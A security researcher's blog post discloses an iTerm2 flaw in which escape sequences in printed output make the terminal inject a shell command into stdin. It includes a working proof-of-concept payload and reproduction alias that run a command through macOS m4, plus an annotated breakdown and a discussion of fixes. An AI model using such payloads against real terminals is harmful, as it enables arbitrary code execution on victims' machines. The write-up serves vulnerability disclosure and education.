From Terminal Output to Arbitrary Remote Code Execution

It was the year of the Linux desktop 1978. Old yellowed computers were not yet old, nor yellowed. Digital Equipment Corporation released the first popular terminal to support a standardized in-band encoding for control functions, the VT100.

Little did they know, that almost half a century later, it will still be the defacto standard for all terminal emulators, essential to the workflow of anyone who programs professionally in any capacity.

Very cool @solid-snail, but what does that have to do with Remote Code Execution?

Well, recall me saying in-band encoding? It means that when a program wants to relay a message to the terminal it embeds it in the output, and perhaps more importantly, when the terminal wants to relay a message to the program it embeds it in the input. Yes, the user input.

update: there are now two CVEs for the vulnerabilities. CVE-2023-46300 and CVE-2023-46301.

What’s the Plan?

Attack plan is simple.
A program prints non-sanitized, non-trusted content.
The content will contain our exploit.
The exploit will elicit a response that contains a shell command, and a linefeed.
The program, that was not expecting any further input, will leave it waiting in stdin.
After it finished executing, the shell will kick back in, at which point our command will be read and executed.

Now, you might be wondering… Is it really that simple? How come it isn’t abused routinely? Why would that be supported at all by any terminal? Did no one see it coming? Do I really not have anything better to do with my time? I will address almost all of these.

I also plan release a proper repo, with the full source code, and perhaps some demos. It will be linked here when available.

Vulnerability

@gnachman, who was probably fed up with being bottom charged by Apple, created a terminal emulator named iTerm2. iTerm2 implements many features beyond the standard experience of a terminal emulator. Some are implemented using non-standard escape sequences. This is an escape sequence: \x1b[32m. It changes the color of text. You can try it out with the printf command, printf '\x1b[32mtext'

Two of such features, are of interest to us.

Tmux integration
Request upload

I won’t get into the details of what those features do, because it doesn’t matter to us. It is a specific implementation detail that we’re after. They both inject a linefeed to stdin.

We got the terminal to press enter in the name of the user, now what?

Exploit

Two exploits I came up with! One requires the attacker to deliver an executable to the victim’s machine, and works with bash but not zsh. The other, which I’m more proud of, requires only for the command’s output to be somewhat repeatable, and works with zsh but not bash.

Terminal developers aren’t so excited about the idea of us running surprise commands for their users, as it turns out, and left very little for us to work with. We are limited in what we can inject to stdin.

I could say I managed to run ln with no arguments and call it a day, but that would be boring!

We can’t place the command we want to run directly in stdin. That means we need to find another place for it.
A file? Could we run it?
If we could specify it as an argument of a command we wouldn’t be dealing with a file right now. We also can’t specify just a file’s name as the command. The shell will interpret it as a name of a command and not a path to an executable.

The solution is obvious. Ask the terminal to report a color!

The response to a query about a color value will contain slashes, which will cause the shell to interpret it as a path, not a command.

Lets try. When we printf '\x1b]4;0;#000\007\x1b]4;0;?\007', we can see that our shell’s command line now contains 4;0;rgb:0000/0000/0000. If executed, it will attempt to run a file at rgb:0000/0000/0000.

But to be honest, files… files are annoying.
How am I going to deliver one all the way to your machine?!
We need yet another place for the code.

I’ll stop teasing, the place is the output itself, and this is the exploit:

syscmd(open -a Calculator) \x1b[5n \x1bP$q$|\x1b\\ \x1b[#| \x1b[14H \x1b[6n \x1bP1000p%session-changed $9 s\n

To reproduce (tested it on iTerm2 3.5.0beta10):

alias newcmd='echo -e '\''syscmd(open -a Calculator) \x1b[5n \x1bP$q$|\x1b\\ \x1b[#| \x1b[14H \x1b[6n \x1bP1000p%session-changed $9 s\n'\'
newcmd arg

Lets break down this mess.

syscmd(open -a Calculator) - as of now, does absolutely nothing, besides being printed out.
\x1b[5n - Device Status Report (DSR) - pushes \x1b[0n to stdin. Results in n in the command line.
\x1bP$q$|\x1b\\ - Request Status String (DECRQSS) - pushes \x1bP1$r{alpha-numeric stuff}$|\x1b\\ to stdin.
\x1b[#| - Report selected graphic rendition (XTREPORTSGR) - pushes \x1b[{0 or nothing by default}m to stdin. Results in m being added to the command line.
\x1b[14H - Cursor Position (CUP) - moves the cursor to row 14 (of the terminal, not the shell).
\x1b[6n - Device Status Report (DSR) - pushes \x1b[14;{cursor column}R. Results in 4;{cursor column}R being added to the command line.
\x1bP1000p - Tmux integration - indicates that tmux has started in control mode.
%session-changed $9 s\n - imitates output of tmux in control mode. Needed for more consistent and predictable results.

I know that by now it might seem obvious to most of you, but no one likes being the one that raises their hand, so I’ll explain it further.

syscmd(open -a Calculator) is our Chechov’s gun.

Now, to understand why not all characters pushed to stdin end up in the shell’s command line, you have to understand another use for escape sequences - special keys and key combos. There’s no character code for PgUp. There’s no ASCII code for Shift+F1. When you headbutt the keyboard after trying to figure out why Ubuntu is hell-bent on removing its own desktop environment on the next full-upgrade, those are expressed by the terminal as escape sequences. That is why most of the sequences pushed to stdin in this exploit are partially swallowed by the shell - they can also represent (sometimes invalid) key presses.

\x1b[5n. Why do we want n in the command line? Put a pin in that, but it has to do with the fact that we knew the exploited command starts with an n (our alias newcmd in this case).

The response to \x1bP$q$|\x1b\\ is \x1bP1$r{alpha-numeric stuff}$|\x1b\\. This time we want to pay attention to how the shell interprets the sequence. \x1bP is equivalent to alt+P. You can actually test that easily. Open a terminal, press the Esc key, release it, then press P. In zsh it will lookup a command from the command history based on the first word in the current command line, if there is one, and load it. In our case it will be newcmd arg. The rest of the response is appended to it, so: newcmd arg1$r{alpha-numeric stuff}$|.

\x1b[#| will add m to our command line: newcmd arg1$r{alpha-numeric stuff}$|m.

\x1b[14H sets the terminal’s cursor to line 14. \x1b[6n is a request for cursor coordinates. The line position will be 14 as we set it, and the response will be: \x1b[14;{cursor column}R. \x1b[1 is swallowed by the shell, so our current command line is now:

newcmd arg1$r{alpha-numeric stuff}$|m4;{cursor column}R

Before we blow our final punches, lets take moment to appreciate what’s going on. $r{alpha-numeric stuff}$ will be discarded by the shell as an undefined environment variable and a $ without any variable specified. Anything after the ; is irrelevant to us. Our current effective command is newcmd arg1|m4.

m4 is a command built-in to macOS, for some reason. In case you’re not familiar with it, it is a macro engine. It is basically a c/c++ compiler without the compiler.

This is where our Chechov’s gun makes its appearance again. m4 has a built-in macro for running commands in the system’s shell. By piping the output to m4 we’re able to utilize it.

Finally, \x1bP1000p%session-changed $9 s\n runs the command for us by pushing a linefeed to stdin. Not only that, it pushes multiple linefeeds, each preceded by a tmux command.

Having said that, I can finally return to our pinned question. We needed the command line to start with the same letter as the exploited command, because at times the exploit would fail due to the shell processing some of the tmux commands before traversing back in the command history. I didn’t investigate the cause of that, but I could easily mitigate it by filtering the command history in this manner.

Thoughts

As it turns out, I wasn’t the first to come up with this concept. Security concerns regarding this matter have existed for decades now. In fact, CVEs regarding this matter have been coming up for as late as 2021 by major terminal emulators.

However, as far as I can tell, my method of exploitation is novel, as it didn’t rely on the ability to push arbitrary commands to stdin, or deliver additional resources to the victim, such as files. It is self contained.

You might think to yourself, “Easy! Just don’t inject linefeeds and arbitrary data to stdin, and you should be good.”. You would have a point, and most terminals do exactly that, but you won’t be addressing the root cause. This solutions assumes the use of a POSIX shell. What if it’s exploited in the context of a program such as Vim? It’s easy to see how real damage can be done without the use of a linefeed.

The reason vulnerabilities of this kind keep appearing is that there is a fundamental problem in the way terminals work. Embedding commands in that manner is as egregious as using string concatenation to create sql queries. We didn’t even touch on the fact that, given the opportunity, an attacker can use escape sequences to arbitrarily change the entire display of the terminal.

The standards that define those mechanisms originate in the 70s, the 70s! The modern environment in which terminal emulators are used today could not have been predicted at the time.

Its legacy status means that virtually any tool you use from the terminal already supports it.

Moreover, those vulnerabilities are logical and inherent to the standard itself. They can’t be patched in-place in the same manner you would a buffer overflow, without breaking compatibility.

So what are we to do?

Solutions

One solution would be to have all tools used in the terminal sanitize non-trusted data. Good luck with that.

To fix the fundamental problem, you would probably need to break compatibility, which would suck. Suddenly you do not have colored text, you do not have progress bars, you do not have fancy interfaces, you do not pass go, do not collect $200. Developers will need to explicitly support that new alternative.

But even if we could assure good adoption rate, the biggest hurdle, ironically, will probably be restriction of feature support. Restrictions made by the terminal meant that:

Interfaces had to primarily be text based, and minimal.
Keyboard as first class citizen.
Supporting scriptability was incentivised. As a result, it is easy to convert day to day workflows to automation.
Easy cross compatibility when it comes to user interface.
Easy to support. If your program supports stdin and stdout, it can support the terminal. Regardless of hardware, OS, programming language, or framework.
Stability! You don’t have to worry about future support as much. When support is a moving target you find yourself in a situation like folding displays. Of course this is a double edged sword, like we’re seeing in this article.

When looking at the current landscape of software development, I find it difficult to have the confidence that developers possess the restraint required to uphold those standards. Even when looking at tools aimed at highly technical people! Lets take a look at IDA Pro and Radare2 as an example. Even though IDA Pro has many other redeeming qualities, It clearly misses the mark at some of these points. For example, in Radare2 your interactions with the program can be converted, almost directly, into scripts. Not the case in IDA Pro.

In fact, the only example of a gui application that would fit those requirements, is emacs. For those interested, an article by Spencer Baugh about terminal emulators, that also explores the idea of emacs as a replacement for the terminal. But even a platform as capable as emacs needed to feature a terminal emulator. It will not solve the Problem of backwards compatibility.

Support Open Source

@gnachman has handled my report professionally, and reacted swiftly with a patch. So despite afflicting Objective-C onto my eyes during this research, I’d encourage anyone who finds his software useful to express support via a donation:
https://iterm2.com/donate.html

insert self shilling
I myself have more blog posts down the pipeline on already done research. I’m also conducting more research, focusing on open source tools used by tech professionals, but not exclusively. I believe it’s crucial to secure our toolchains, at a time when supply chain attacks are so painful, especially for projects that rely on community support and are often overlooked.

And uhm… if you find my research useful, I too hav- I mean… I also accept- uuuh…